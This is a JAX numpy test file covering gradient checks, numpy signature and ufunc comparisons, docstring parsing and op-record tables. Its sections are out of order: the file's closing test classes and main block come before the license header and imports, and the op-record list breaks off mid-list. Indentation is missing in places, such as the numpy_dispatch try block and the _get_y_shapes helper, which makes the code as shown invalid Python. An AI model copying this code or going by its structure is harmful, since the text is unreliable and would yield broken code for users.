    grad_test_spec(jnp.logaddexp2, nargs=2, order=2,
                   rng_factory=partial(jtu.rand_uniform, low=-0.9, high=0.9),
                   dtypes=[np.float64], tol=1e-4),
]

# Ops whose gradients are additionally checked at particular input values
# (typically points where numerical differentiation is delicate).
GradSpecialValuesTestSpec = collections.namedtuple(
    "GradSpecialValuesTestSpec", ["op", "values", "order"])

GRAD_SPECIAL_VALUE_TEST_RECORDS = [
    GradSpecialValuesTestSpec(jnp.arcsinh, [0., 1000.], 2),
    GradSpecialValuesTestSpec(jnp.arccosh, [1000.], 2),
    GradSpecialValuesTestSpec(jnp.arctanh, [0.], 2),
    GradSpecialValuesTestSpec(jnp.sinc, [0.], 1),
]
@jtu.with_config(jax_numpy_rank_promotion="raise")
class NumpyGradTests(jtu.JaxTestCase):
  """Gradient checks for jnp compound ops (most grad tests live in lax_test.py)."""

  @parameterized.named_parameters(itertools.chain.from_iterable(
      jtu.cases_from_list(
        {"testcase_name": jtu.format_test_name_suffix(
            rec.name, shapes, itertools.repeat(dtype)),
         "op": rec.op, "rng_factory": rec.rng_factory, "shapes": shapes, "dtype": dtype,
         "order": rec.order, "tol": rec.tol}
        for shapes in itertools.combinations_with_replacement(nonempty_shapes, rec.nargs)
        for dtype in rec.dtypes)
      for rec in GRAD_TEST_RECORDS))
  @jax.numpy_rank_promotion('allow')  # This test explicitly exercises implicit rank promotion.
  def testOpGrad(self, op, rng_factory, shapes, dtype, order, tol):
    """Numerically check fwd/rev derivatives for each GRAD_TEST_RECORDS op."""
    rng = rng_factory(self.rng())
    tol = jtu.join_tolerance(tol, {np.float32: 1e-1, np.float64: 1e-3,
                                   np.complex64: 1e-1, np.complex128: 1e-3})
    args = tuple(rng(shape, dtype) for shape in shapes)
    check_grads(op, args, order, ["fwd", "rev"], tol, tol)

  @parameterized.named_parameters(itertools.chain.from_iterable(
      jtu.cases_from_list(
        {"testcase_name": "_{}_{}".format(rec.op.__name__, special_value),
         "op": rec.op, "special_value": special_value, "order": rec.order}
        for special_value in rec.values)
      for rec in GRAD_SPECIAL_VALUE_TEST_RECORDS))
  def testOpGradSpecialValue(self, op, special_value, order):
    """Check derivatives at specific input values (e.g. branch points like 0.)."""
    check_grads(op, (special_value,), order, ["fwd", "rev"],
                atol={np.float32: 3e-3})

  def testSincAtZero(self):
    # Some manual tests for sinc at zero, since it doesn't have well-behaved
    # numerical derivatives at zero
    def deriv(f):
      # First forward-mode derivative of f via jvp with unit tangent.
      return lambda x: api.jvp(f, (x,), (1.,))[1]

    def apply_all(fns, x):
      # Compose the given transformations left-to-right on x.
      for f in fns:
        x = f(x)
      return x

    # Expected derivative values d1..d4 at zero; every mix of jvp-based and
    # grad-based differentiation of the same order must agree with them.
    d1 = 0.
    for ops in itertools.combinations_with_replacement([deriv, api.grad], 1):
      self.assertAllClose(apply_all(ops, jnp.sinc)(0.), d1)

    d2 = -np.pi ** 2 / 3
    for ops in itertools.combinations_with_replacement([deriv, api.grad], 2):
      self.assertAllClose(apply_all(ops, jnp.sinc)(0.), d2)

    d3 = 0.
    for ops in itertools.combinations_with_replacement([deriv, api.grad], 3):
      self.assertAllClose(apply_all(ops, jnp.sinc)(0.), d3)

    d4 = np.pi ** 4 / 5
    for ops in itertools.combinations_with_replacement([deriv, api.grad], 4):
      self.assertAllClose(apply_all(ops, jnp.sinc)(0.), d4)

  def testSincGradArrayInput(self):
    # tests for a bug almost introduced in #5077
    jax.grad(lambda x: jnp.sinc(x).sum())(jnp.arange(10.))  # doesn't crash

  def testTakeAlongAxisIssue1521(self):
    # https://github.com/google/jax/issues/1521
    idx = jnp.repeat(jnp.arange(3), 10).reshape((30, 1))

    def f(x):
      y = x * jnp.arange(3.).reshape((1, 3))
      return jnp.take_along_axis(y, idx, -1).sum()

    check_grads(f, (1.,), order=1)

  @parameterized.named_parameters(jtu.cases_from_list(
      {"testcase_name": jtu.format_test_name_suffix("", shapes, itertools.repeat(dtype)),
       "shapes": shapes, "dtype": dtype}
      for shapes in filter(
        _shapes_are_broadcast_compatible,
        itertools.combinations_with_replacement(nonempty_shapes, 2))
      for dtype in (np.complex128, )))
  @jax.numpy_rank_promotion('allow')  # This test explicitly exercises implicit rank promotion.
  def testGradLogaddexpComplex(self, shapes, dtype):
    """First-order gradient check for logaddexp with complex inputs."""
    rng = jtu.rand_default(self.rng())
    args = tuple(rng(shape, dtype) for shape in shapes)
    if jtu.device_under_test() == "tpu":
      tol = 5e-2
    else:
      tol = 3e-2
    check_grads(jnp.logaddexp, args, 1, ["fwd", "rev"], tol, tol)

  @parameterized.named_parameters(jtu.cases_from_list(
      {"testcase_name": jtu.format_test_name_suffix("", shapes, itertools.repeat(dtype)),
       "shapes": shapes, "dtype": dtype}
      for shapes in filter(
        _shapes_are_broadcast_compatible,
        itertools.combinations_with_replacement(nonempty_shapes, 2))
      for dtype in (np.complex128, )))
  @jax.numpy_rank_promotion('allow')  # This test explicitly exercises implicit rank promotion.
  def testGradLogaddexp2Complex(self, shapes, dtype):
    """First-order gradient check for logaddexp2 with complex inputs."""
    rng = jtu.rand_default(self.rng())
    args = tuple(rng(shape, dtype) for shape in shapes)
    if jtu.device_under_test() == "tpu":
      tol = 5e-2
    else:
      tol = 3e-2
    check_grads(jnp.logaddexp2, args, 1, ["fwd", "rev"], tol, tol)
@jtu.with_config(jax_numpy_rank_promotion="raise")
class NumpySignaturesTest(jtu.JaxTestCase):
  """Checks that jnp's wrapped functions keep signatures consistent with numpy."""

  def testWrappedSignaturesMatch(self):
    """Test that jax.numpy function signatures match numpy."""
    jnp_funcs = {name: getattr(jnp, name) for name in dir(jnp)}
    # Only functions produced by the numpy-wrapping machinery carry
    # __np_wrapped__, which points back at the wrapped numpy function.
    func_pairs = {name: (fun, fun.__np_wrapped__) for name, fun in jnp_funcs.items()
                  if hasattr(fun, '__np_wrapped__')}
    assert len(func_pairs) > 0

    # TODO(jakevdp): fix some of the following signatures. Some are due to wrong argument names.
    # numpy parameters that jnp deliberately does not support, per function.
    unsupported_params = {
      'angle': ['deg'],
      'asarray': ['like'],
      'broadcast_to': ['subok', 'array'],
      'clip': ['kwargs'],
      'corrcoef': ['ddof', 'bias', 'dtype'],
      'cov': ['dtype'],
      'empty_like': ['subok', 'order'],
      'einsum': ['kwargs'],
      'einsum_path': ['einsum_call'],
      'eye': ['order', 'like'],
      'identity': ['like'],
      'full': ['order', 'like'],
      'full_like': ['subok', 'order'],
      'histogram': ['normed'],
      'histogram2d': ['normed'],
      'histogramdd': ['normed'],
      'ones': ['order', 'like'],
      'ones_like': ['subok', 'order'],
      'tri': ['like'],
      'unwrap': ['period'],
      'zeros_like': ['subok', 'order']
    }

    # Parameters jnp adds beyond the numpy signature, per function.
    extra_params = {
      'broadcast_to': ['arr'],
      'einsum': ['precision'],
      'einsum_path': ['subscripts'],
    }

    mismatches = {}

    for name, (jnp_fun, np_fun) in func_pairs.items():
      # broadcast_shapes is not available in numpy < 1.20
      if numpy_version < (1, 20) and name == "broadcast_shapes":
        continue
      # Some signatures have changed; skip for older numpy versions.
      if numpy_version < (1, 19) and name in ['einsum_path', 'gradient', 'isscalar']:
        continue
      # Note: can't use inspect.getfullargspec due to numpy issue
      # https://github.com/numpy/numpy/issues/12225
      try:
        np_params = inspect.signature(np_fun).parameters
      except ValueError:
        # Some functions cannot be inspected
        continue
      jnp_params = inspect.signature(jnp_fun).parameters
      extra = set(extra_params.get(name, []))
      unsupported = set(unsupported_params.get(name, []))

      # Checks to prevent tests from becoming out-of-date. If these fail,
      # it means that extra_params or unsupported_params need to be updated.
      assert extra.issubset(jnp_params), f"{name}: extra={extra} is not a subset of jnp_params={set(jnp_params)}."
      assert not unsupported.intersection(jnp_params), f"{name}: unsupported={unsupported} overlaps with jnp_params={set(jnp_params)}."

      # Skip functions that only have *args and **kwargs; we can't introspect these further.
      var_args = (inspect.Parameter.VAR_POSITIONAL, inspect.Parameter.VAR_KEYWORD)
      if all(p.kind in var_args for p in jnp_params.values()):
        continue
      if all(p.kind in var_args for p in np_params.values()):
        continue

      # Remove known extra parameters.
      jnp_params = {a: p for a, p in jnp_params.items() if a not in extra}

      # Remove known unsupported parameters.
      np_params = {a: p for a, p in np_params.items() if a not in unsupported}

      # Older versions of numpy may have fewer parameters; to avoid extraneous errors on older numpy
      # versions, we allow for jnp to have more parameters.
      if list(jnp_params)[:len(np_params)] != list(np_params):
        mismatches[name] = {'np_params': list(np_params), 'jnp_params': list(jnp_params)}

    self.assertEqual(mismatches, {})
# Names of all concrete dtypes to probe each numpy ufunc with below.
_all_dtypes: List[str] = [
    "bool_",
    "uint8", "uint16", "uint32", "uint64",
    "int8", "int16", "int32", "int64",
    "float16", "float32", "float64",
    "complex64", "complex128",
]
def _all_numpy_ufuncs() -> Iterator[str]:
  """Yield the name of every ufunc exposed in the top-level numpy namespace."""
  for attr_name in dir(np):
    if isinstance(getattr(np, attr_name), np.ufunc):
      yield attr_name
def _dtypes_for_ufunc(name: str) -> Iterator[Tuple[str, ...]]:
  """Yield each combination of input dtypes accepted by the named numpy ufunc.

  Acceptance is probed by calling the ufunc on one-element arrays; a
  TypeError means the combination is rejected. "divide by zero" warnings
  raised during the probe are suppressed.
  """
  func = getattr(np, name)
  for arg_dtypes in itertools.product(_all_dtypes, repeat=func.nin):
    sample_args = tuple(np.ones(1, dtype=d) for d in arg_dtypes)
    try:
      with warnings.catch_warnings():
        warnings.filterwarnings("ignore", "divide by zero", RuntimeWarning)
        func(*sample_args)
    except TypeError:
      continue
    yield arg_dtypes
@jtu.with_config(jax_numpy_rank_promotion="raise")
class NumpyUfuncTests(jtu.JaxTestCase):
  """Checks that jnp exposes a working equivalent of each top-level numpy ufunc."""

  @parameterized.named_parameters(
      # NOTE: the join separator must be quoted with single quotes here:
      # reusing the enclosing double quote inside a double-quoted f-string
      # is a SyntaxError on Python < 3.12.
      {"testcase_name": f"_{name}_{','.join(arg_dtypes)}",
       "name": name, "arg_dtypes": arg_dtypes}
      for name in _all_numpy_ufuncs()
      for arg_dtypes in jtu.cases_from_list(_dtypes_for_ufunc(name)))
  def testUfuncInputTypes(self, name, arg_dtypes):
    """Apply the named ufunc via np and jnp to 1-element arrays and compare."""
    # TODO(jakevdp): fix following failures and remove from this exception list.
    if (name in ['divmod', 'floor_divide', 'fmod', 'gcd', 'left_shift', 'mod',
                 'power', 'remainder', 'right_shift', 'rint', 'square']
        and 'bool_' in arg_dtypes):
      self.skipTest(f"jax.numpy does not support {name}{tuple(arg_dtypes)}")
    if name == 'arctanh' and jnp.issubdtype(arg_dtypes[0], jnp.complexfloating):
      self.skipTest("np.arctanh & jnp.arctanh have mismatched NaNs for complex input.")
    for dtype in arg_dtypes:
      jtu.skip_if_unsupported_type(dtype)

    jnp_op = getattr(jnp, name)
    np_op = getattr(np, name)
    np_op = jtu.ignore_warning(category=RuntimeWarning,
                               message="divide by zero.*")(np_op)
    args_maker = lambda: tuple(np.ones(1, dtype=dtype) for dtype in arg_dtypes)

    # Probe first: an op not yet implemented in jnp should skip, not fail.
    try:
      jnp_op(*args_maker())
    except NotImplementedError:
      self.skipTest(f"jtu.{name} is not yet implemented.")

    # large tol comes from the fact that numpy returns float16 in places
    # that jnp returns float32. e.g. np.cos(np.uint8(0))
    self._CheckAgainstNumpy(np_op, jnp_op, args_maker, check_dtypes=False, tol=1E-2)
@jtu.with_config(jax_numpy_rank_promotion="raise")
class NumpyDocTests(jtu.JaxTestCase):
  """Sanity checks for jnp docstring wrapping and numpydoc parsing."""

  def test_lax_numpy_docstrings(self):
    """Docstring wrapping & transformation must not have silently failed."""
    # Functions that have their own docstrings & don't wrap numpy.
    known_exceptions = {'broadcast_arrays', 'vectorize'}
    for name in dir(jnp):
      if name in known_exceptions or name.startswith('_'):
        continue
      obj = getattr(jnp, name)
      # We only check signatures of functions (not classes, not non-callables).
      if isinstance(obj, type) or not callable(obj):
        continue
      # Some jnp functions are imported from numpy or jax.dtypes directly.
      if any(obj is getattr(mod, obj.__name__, None) for mod in [np, dtypes]):
        continue
      wrapped_fun = obj.__np_wrapped__
      # If the wrapped function has a docstring, obj should too.
      if wrapped_fun.__doc__ and not obj.__doc__:
        raise Exception(f"jnp.{name} does not contain wrapped docstring.")
      if obj.__doc__ and "*Original docstring below.*" not in obj.__doc__:
        raise Exception(f"jnp.{name} does not have a wrapped docstring.")

  def test_parse_numpydoc(self):
    """_parse_numpydoc handles every docstring in numpy's top-level namespace."""
    section_titles = {'Attributes', 'Examples', 'Notes',
                      'Parameters', 'Raises', 'References',
                      'Returns', 'See also', 'See Also', 'Warnings', 'Warns'}
    headings = [f"{title}\n{'-' * len(title)}" for title in section_titles]
    for name in dir(np):
      if name.startswith('_'):
        continue
      obj = getattr(np, name)
      if isinstance(obj, type) or not callable(obj):
        continue
      if 'built-in function' in repr(obj):
        continue
      parsed = _parse_numpydoc(obj.__doc__)

      if not obj.__doc__:
        # A missing docstring must be handled gracefully.
        self.assertEqual(parsed, ParsedDoc(obj.__doc__))
        continue

      # No unexpected section names may be found.
      extra_keys = parsed.sections.keys() - section_titles
      if extra_keys:
        raise ValueError(f"Extra section headers found in np.{name}: {extra_keys}")

      # Every docstring must have a summary.
      if not parsed.summary:
        raise ValueError(f"No summary found for np.{name}")

      # No expected headings may remain in the front matter.
      for heading in headings:
        assert heading not in parsed.front_matter
# Allow running this test file directly, using JAX's custom test loader.
if __name__ == "__main__":
  absltest.main(testLoader=jtu.JaxTestLoader())
# Copyright 2018 Google LLC
#
# Licensed under the Apache License, Version 2.0 (the "License");
# you may not use this file except in compliance with the License.
# You may obtain a copy of the License at
#
# https://www.apache.org/licenses/LICENSE-2.0
#
# Unless required by applicable law or agreed to in writing, software
# distributed under the License is distributed on an "AS IS" BASIS,
# WITHOUT WARRANTIES OR CONDITIONS OF ANY KIND, either express or implied.
# See the License for the specific language governing permissions and
# limitations under the License.
import collections
import functools
from functools import partial
import inspect
import itertools
import operator
from typing import cast, Iterator, Optional, List, Tuple
import unittest
from unittest import SkipTest
import warnings
from absl.testing import absltest
from absl.testing import parameterized
import numpy as np
try:
import numpy_dispatch
except ImportError:
numpy_dispatch = None
import jax
import jax.ops
from jax._src import api
from jax import lax
from jax import numpy as jnp
from jax import test_util as jtu
from jax._src import dtypes
from jax import tree_util
from jax.interpreters import xla
from jax.test_util import check_grads
from jax._src.util import prod
from jax._src.numpy.util import _parse_numpydoc, ParsedDoc
from jax.config import config
config.parse_flags_with_absl()
FLAGS = config.FLAGS

# numpy version as an int tuple, e.g. (1, 21, 0), for version-gated tests.
numpy_version = tuple(map(int, np.__version__.split('.')[:3]))

# Shape vocabularies shared by the parameterized tests below.
nonempty_nonscalar_array_shapes = [(4,), (3, 4), (3, 1), (1, 4), (2, 1, 4), (2, 3, 4)]
nonempty_array_shapes = [()] + nonempty_nonscalar_array_shapes
one_dim_array_shapes = [(1,), (6,), (12,)]
empty_array_shapes = [(0,), (0, 4), (3, 0),]

# Sentinels (from jtu) standing in for numpy-scalar / python-scalar arguments.
scalar_shapes = [jtu.NUMPY_SCALAR_SHAPE, jtu.PYTHON_SCALAR_SHAPE]
array_shapes = nonempty_array_shapes + empty_array_shapes
nonzerodim_shapes = nonempty_nonscalar_array_shapes + empty_array_shapes
nonempty_shapes = scalar_shapes + nonempty_array_shapes
all_shapes = scalar_shapes + array_shapes

# Dtype vocabularies, grouped by numeric kind.
float_dtypes = jtu.dtypes.all_floating
complex_dtypes = jtu.dtypes.complex
int_dtypes = jtu.dtypes.all_integer
unsigned_dtypes = jtu.dtypes.all_unsigned
bool_dtypes = jtu.dtypes.boolean
default_dtypes = float_dtypes + int_dtypes
inexact_dtypes = float_dtypes + complex_dtypes
number_dtypes = float_dtypes + complex_dtypes + int_dtypes
all_dtypes = number_dtypes + bool_dtypes

# The single canonical dtype for each Python scalar category.
python_scalar_dtypes = [jnp.bool_, jnp.int_, jnp.float_, jnp.complex_]

# uint64 is problematic because with any uint type it promotes to float:
int_dtypes_no_uint64 = [d for d in int_dtypes + unsigned_dtypes if d != np.uint64]
def _valid_dtypes_for_shape(shape, dtypes):
  """Restrict `dtypes` to those valid for the given shape placeholder.

  Python scalars only have one type in each category (float, bool, etc.),
  so for the PYTHON_SCALAR_SHAPE sentinel only those canonical dtypes apply.
  """
  if shape is not jtu.PYTHON_SCALAR_SHAPE:
    return dtypes
  return [t for t in dtypes if t in python_scalar_dtypes]
def _shape_and_dtypes(shapes, dtypes):
  """Yield every (shape, dtype) pair that is valid for the shape."""
  return ((s, d) for s in shapes for d in _valid_dtypes_for_shape(s, dtypes))
def _compatible_shapes(shape):
  """Return shapes broadcast-compatible with `shape`: its trailing suffixes.

  Scalar placeholders (and rank-0 shapes) are only compatible with themselves.
  """
  if shape in scalar_shapes or np.ndim(shape) == 0:
    return [shape]
  return (shape[i:] for i in range(len(shape) + 1))
def _get_y_shapes(y_dtype, shape, rowvar):
# Helper function for testCov.
if y_dtype is None:
return [None]
if len(shape) == 1:
return [shape]
elif rowvar or shape[0] == 1:
return [(1, shape[-1]), (2, shape[-1]), (5, shape[-1])]
return [(shape[0], 1), (shape[0], 2), (shape[0], 5)]
# Record describing one op to test: the jnp/np name, its arity, the dtypes and
# shapes to sample, an RNG factory, which autodiff modes to check, plus
# per-test overrides (display name, dtype checking, tolerances, inexactness).
OpRecord = collections.namedtuple(
    "OpRecord",
    ["name", "nargs", "dtypes", "shapes", "rng_factory", "diff_modes",
     "test_name", "check_dtypes", "tolerance", "inexact"])
def op_record(name, nargs, dtypes, shapes, rng_factory, diff_modes,
              test_name=None, check_dtypes=True,
              tolerance=None, inexact=False):
  """Build an OpRecord, defaulting test_name to the op name."""
  return OpRecord(name=name, nargs=nargs, dtypes=dtypes, shapes=shapes,
                  rng_factory=rng_factory, diff_modes=diff_modes,
                  test_name=test_name or name, check_dtypes=check_dtypes,
                  tolerance=tolerance, inexact=inexact)
# Ops whose jnp implementation should match the identically-named numpy op;
# consumed by LaxBackedNumpyTests.testOp below.
JAX_ONE_TO_ONE_OP_RECORDS = [
    op_record("abs", 1, number_dtypes + unsigned_dtypes + bool_dtypes,
              all_shapes, jtu.rand_default, ["rev"]),
    op_record("add", 2, all_dtypes, all_shapes, jtu.rand_default, ["rev"]),
    op_record("ceil", 1, float_dtypes, all_shapes, jtu.rand_default, []),
    op_record("ceil", 1, int_dtypes + unsigned_dtypes, all_shapes,
              jtu.rand_default, [], check_dtypes=False),
    op_record("conj", 1, number_dtypes, all_shapes, jtu.rand_default, ["rev"]),
    op_record("equal", 2, all_dtypes, all_shapes, jtu.rand_some_equal, []),
    op_record("exp", 1, number_dtypes, all_shapes, jtu.rand_default, ["rev"],
              inexact=True),
    op_record("fabs", 1, float_dtypes, all_shapes, jtu.rand_default, ["rev"]),
    op_record("float_power", 2, inexact_dtypes, all_shapes,
              partial(jtu.rand_default, scale=1), ["rev"],
              tolerance={jnp.bfloat16: 1e-2, np.float32: 1e-3,
                         np.float64: 1e-12, np.complex64: 2e-4,
                         np.complex128: 1e-12}, check_dtypes=False),
    op_record("floor", 1, float_dtypes, all_shapes, jtu.rand_default, []),
    op_record("floor", 1, int_dtypes + unsigned_dtypes, all_shapes,
              jtu.rand_default, [], check_dtypes=False),
    op_record("greater", 2, all_dtypes, all_shapes, jtu.rand_some_equal, []),
    op_record("greater_equal", 2, all_dtypes, all_shapes, jtu.rand_some_equal, []),
    op_record("i0", 1, float_dtypes, all_shapes, jtu.rand_default, [],
              check_dtypes=False),
    op_record("ldexp", 2, int_dtypes, all_shapes, jtu.rand_default, [], check_dtypes=False),
    op_record("less", 2, all_dtypes, all_shapes, jtu.rand_some_equal, []),
    op_record("less_equal", 2, all_dtypes, all_shapes, jtu.rand_some_equal, []),
    op_record("log", 1, number_dtypes, all_shapes, jtu.rand_positive, ["rev"],
              inexact=True),
    op_record("logical_and", 2, all_dtypes, all_shapes, jtu.rand_bool, []),
    op_record("logical_not", 1, all_dtypes, all_shapes, jtu.rand_bool, []),
    op_record("logical_or", 2, all_dtypes, all_shapes, jtu.rand_bool, []),
    op_record("logical_xor", 2, all_dtypes, all_shapes, jtu.rand_bool, []),
    op_record("maximum", 2, all_dtypes, all_shapes, jtu.rand_some_inf, []),
    op_record("minimum", 2, all_dtypes, all_shapes, jtu.rand_some_inf, []),
    op_record("multiply", 2, all_dtypes, all_shapes, jtu.rand_default, ["rev"]),
    op_record("negative", 1, number_dtypes, all_shapes, jtu.rand_default, ["rev"]),
    op_record("nextafter", 2, [f for f in float_dtypes if f != jnp.bfloat16],
              all_shapes, jtu.rand_default, ["rev"], inexact=True, tolerance=0),
    op_record("not_equal", 2, all_dtypes, all_shapes, jtu.rand_some_equal, ["rev"]),
    op_record("array_equal", 2, number_dtypes, all_shapes, jtu.rand_some_equal, ["rev"]),
    op_record("array_equiv", 2, number_dtypes, all_shapes, jtu.rand_some_equal, ["rev"]),
    op_record("reciprocal", 1, inexact_dtypes, all_shapes, jtu.rand_default, []),
    op_record("subtract", 2, number_dtypes, all_shapes, jtu.rand_default, ["rev"]),
    op_record("signbit", 1, default_dtypes + bool_dtypes, all_shapes,
              jtu.rand_some_inf_and_nan, ["rev"]),
    op_record("trunc", 1, float_dtypes, all_shapes, jtu.rand_some_inf_and_nan, []),
    op_record("trunc", 1, int_dtypes + unsigned_dtypes, all_shapes,
              jtu.rand_some_inf_and_nan, [], check_dtypes=False),
    op_record("sin", 1, number_dtypes, all_shapes, jtu.rand_default, ["rev"],
              inexact=True),
    op_record("cos", 1, number_dtypes, all_shapes, jtu.rand_default, ["rev"],
              inexact=True),
    op_record("tan", 1, number_dtypes, all_shapes,
              partial(jtu.rand_uniform, low=-1.5, high=1.5), ["rev"],
              inexact=True),
    op_record("sinh", 1, number_dtypes, all_shapes, jtu.rand_default, ["rev"],
              inexact=True),
    op_record("cosh", 1, number_dtypes, all_shapes, jtu.rand_default, ["rev"],
              inexact=True),
    # TODO(b/142975473): on CPU, tanh for complex128 is only accurate to
    # ~float32 precision.
    # TODO(b/143135720): on GPU, tanh has only ~float32 precision.
    op_record("tanh", 1, number_dtypes, all_shapes, jtu.rand_default, ["rev"],
              tolerance={np.float64: 1e-7, np.complex128: 1e-7},
              inexact=True),
    op_record("arcsin", 1, number_dtypes, all_shapes, jtu.rand_small, ["rev"],
              inexact=True),
    op_record("arccos", 1, number_dtypes, all_shapes, jtu.rand_small, ["rev"],
              inexact=True),
    op_record("arctan", 1, number_dtypes, all_shapes, jtu.rand_small, ["rev"],
              inexact=True),
    op_record("arctan2", 2, float_dtypes, all_shapes, jtu.rand_small, ["rev"],
              inexact=True),
    op_record("arcsinh", 1, number_dtypes, all_shapes, jtu.rand_default, ["rev"],
              inexact=True, tolerance={np.complex64: 2E-4, np.complex128: 2E-14}),
    op_record("arccosh", 1, number_dtypes, all_shapes, jtu.rand_default, ["rev"],
              inexact=True, tolerance={np.complex64: 2E-2, np.complex128: 2E-12}),
    op_record("arctanh", 1, number_dtypes, all_shapes, jtu.rand_small, ["rev"],
              inexact=True, tolerance={np.float64: 1e-9}),
]
# Further ops checked against numpy, with per-record promotion/tolerance
# quirks noted; also consumed by LaxBackedNumpyTests.testOp.
JAX_COMPOUND_OP_RECORDS = [
    # angle has inconsistent 32/64-bit return types across numpy versions.
    op_record("angle", 1, number_dtypes, all_shapes, jtu.rand_default, [],
              check_dtypes=False, inexact=True),
    op_record("atleast_1d", 1, default_dtypes, all_shapes, jtu.rand_default, []),
    op_record("atleast_2d", 1, default_dtypes, all_shapes, jtu.rand_default, []),
    op_record("atleast_3d", 1, default_dtypes, all_shapes, jtu.rand_default, []),
    op_record("cbrt", 1, default_dtypes, all_shapes, jtu.rand_some_inf, ["rev"],
              inexact=True),
    op_record("conjugate", 1, number_dtypes, all_shapes, jtu.rand_default, ["rev"]),
    op_record("deg2rad", 1, float_dtypes, all_shapes, jtu.rand_default, []),
    op_record("divide", 2, number_dtypes, all_shapes, jtu.rand_nonzero, ["rev"],
              inexact=True),
    op_record("divmod", 2, int_dtypes + float_dtypes, all_shapes,
              jtu.rand_nonzero, []),
    op_record("exp2", 1, number_dtypes, all_shapes, jtu.rand_default, ["rev"],
              tolerance={jnp.bfloat16: 4e-2, np.float16: 1e-2}, inexact=True),
    # TODO(b/142975473): on CPU, expm1 for float64 is only accurate to ~float32
    # precision.
    op_record("expm1", 1, number_dtypes, all_shapes, jtu.rand_positive, [],
              test_name="expm1_large", tolerance={np.float64: 1e-8}, inexact=True),
    op_record("expm1", 1, number_dtypes, all_shapes, jtu.rand_small_positive,
              [], tolerance={np.float64: 1e-8}, inexact=True),
    op_record("fix", 1, float_dtypes, all_shapes, jtu.rand_default, []),
    op_record("fix", 1, int_dtypes + unsigned_dtypes, all_shapes,
              jtu.rand_default, [], check_dtypes=False),
    op_record("floor_divide", 2, number_dtypes, all_shapes,
              jtu.rand_nonzero, ["rev"]),
    op_record("floor_divide", 2, unsigned_dtypes, all_shapes,
              jtu.rand_nonzero, ["rev"]),
    op_record("fmin", 2, number_dtypes, all_shapes, jtu.rand_some_nan, []),
    op_record("fmax", 2, number_dtypes, all_shapes, jtu.rand_some_nan, []),
    op_record("fmod", 2, default_dtypes, all_shapes, jtu.rand_some_nan, []),
    op_record("heaviside", 2, default_dtypes, all_shapes, jtu.rand_default, [],
              inexact=True),
    op_record("hypot", 2, default_dtypes, all_shapes, jtu.rand_default, [],
              inexact=True),
    op_record("kron", 2, number_dtypes, nonempty_shapes, jtu.rand_default, []),
    op_record("outer", 2, number_dtypes, all_shapes, jtu.rand_default, []),
    op_record("imag", 1, number_dtypes, all_shapes, jtu.rand_some_inf, []),
    op_record("iscomplex", 1, number_dtypes, all_shapes, jtu.rand_some_inf, []),
    op_record("isfinite", 1, inexact_dtypes, all_shapes, jtu.rand_some_inf_and_nan, []),
    op_record("isinf", 1, inexact_dtypes, all_shapes, jtu.rand_some_inf_and_nan, []),
    op_record("isnan", 1, inexact_dtypes, all_shapes, jtu.rand_some_inf_and_nan, []),
    op_record("isneginf", 1, float_dtypes, all_shapes, jtu.rand_some_inf_and_nan, []),
    op_record("isposinf", 1, float_dtypes, all_shapes, jtu.rand_some_inf_and_nan, []),
    op_record("isreal", 1, number_dtypes, all_shapes, jtu.rand_some_inf, []),
    op_record("isrealobj", 1, number_dtypes, all_shapes, jtu.rand_some_inf, []),
    op_record("log2", 1, number_dtypes, all_shapes, jtu.rand_positive, ["rev"],
              inexact=True),
    op_record("log10", 1, number_dtypes, all_shapes, jtu.rand_positive, ["rev"],
              inexact=True),
    op_record("log1p", 1, number_dtypes, all_shapes, jtu.rand_positive, [],
              test_name="log1p_large", tolerance={np.float64: 1e-12},
              inexact=True),
    op_record("log1p", 1, number_dtypes, all_shapes, jtu.rand_small_positive, [],
              tolerance={np.float64: 1e-12}, inexact=True),
    op_record("logaddexp", 2, float_dtypes, all_shapes,
              jtu.rand_some_inf_and_nan, ["rev"],
              tolerance={np.float64: 1e-12}, inexact=True),
    op_record("logaddexp2", 2, float_dtypes, all_shapes,
              jtu.rand_some_inf_and_nan, ["rev"],
              tolerance={np.float16: 1e-2, np.float64: 2e-14}, inexact=True),
    op_record("polyval", 2, number_dtypes, nonempty_nonscalar_array_shapes,
              jtu.rand_default, [], check_dtypes=False,
              tolerance={dtypes.bfloat16: 4e-2, np.float16: 1e-2,
                         np.float64: 1e-12}),
    op_record("positive", 1, number_dtypes, all_shapes, jtu.rand_default, ["rev"]),
    op_record("power", 2, number_dtypes, all_shapes, jtu.rand_positive, ["rev"],
              tolerance={np.complex128: 1e-14}, check_dtypes=False),
    op_record("rad2deg", 1, float_dtypes, all_shapes, jtu.rand_default, []),
    op_record("ravel", 1, all_dtypes, all_shapes, jtu.rand_default, ["rev"]),
    op_record("real", 1, number_dtypes, all_shapes, jtu.rand_some_inf, []),
    op_record("remainder", 2, default_dtypes, all_shapes, jtu.rand_nonzero, [],
              tolerance={np.float16: 1e-2}),
    op_record("mod", 2, default_dtypes, all_shapes, jtu.rand_nonzero, []),
    op_record("modf", 1, float_dtypes, all_shapes, jtu.rand_default, []),
    op_record("modf", 1, int_dtypes + unsigned_dtypes, all_shapes,
              jtu.rand_default, [], check_dtypes=False),
    op_record("rint", 1, inexact_dtypes, all_shapes, jtu.rand_some_inf_and_nan,
              []),
    op_record("rint", 1, int_dtypes + unsigned_dtypes, all_shapes,
              jtu.rand_default, [], check_dtypes=False),
    op_record("sign", 1, number_dtypes + unsigned_dtypes,
              all_shapes, jtu.rand_some_inf_and_nan, []),
    # numpy 1.16 has trouble mixing uint and bfloat16, so we test these separately.
    op_record("copysign", 2, default_dtypes,
              all_shapes, jtu.rand_some_inf_and_nan, [], check_dtypes=False),
    op_record("copysign", 2, unsigned_dtypes,
              all_shapes, jtu.rand_some_inf_and_nan, [], check_dtypes=False),
    op_record("sinc", 1, [t for t in number_dtypes if t != jnp.bfloat16],
              all_shapes, jtu.rand_default, ["rev"],
              tolerance={np.complex64: 1e-5}, inexact=True,
              check_dtypes=False),
    op_record("square", 1, number_dtypes, all_shapes, jtu.rand_default, ["rev"]),
    op_record("sqrt", 1, number_dtypes, all_shapes, jtu.rand_positive, ["rev"],
              inexact=True),
    op_record("transpose", 1, all_dtypes, all_shapes, jtu.rand_default, ["rev"],
              check_dtypes=False),
    op_record("true_divide", 2, all_dtypes, all_shapes, jtu.rand_nonzero,
              ["rev"], inexact=True),
    op_record("ediff1d", 3, [np.int32], all_shapes, jtu.rand_default, []),
    # TODO(phawkins): np.unwrap does not correctly promote its default period
    # argument under NumPy 1.21 for bfloat16 inputs. It works fine if we
    # explicitly pass a bfloat16 value that does not need promotion. We should
    # probably add a custom test harness for unwrap that tests the period
    # argument anyway.
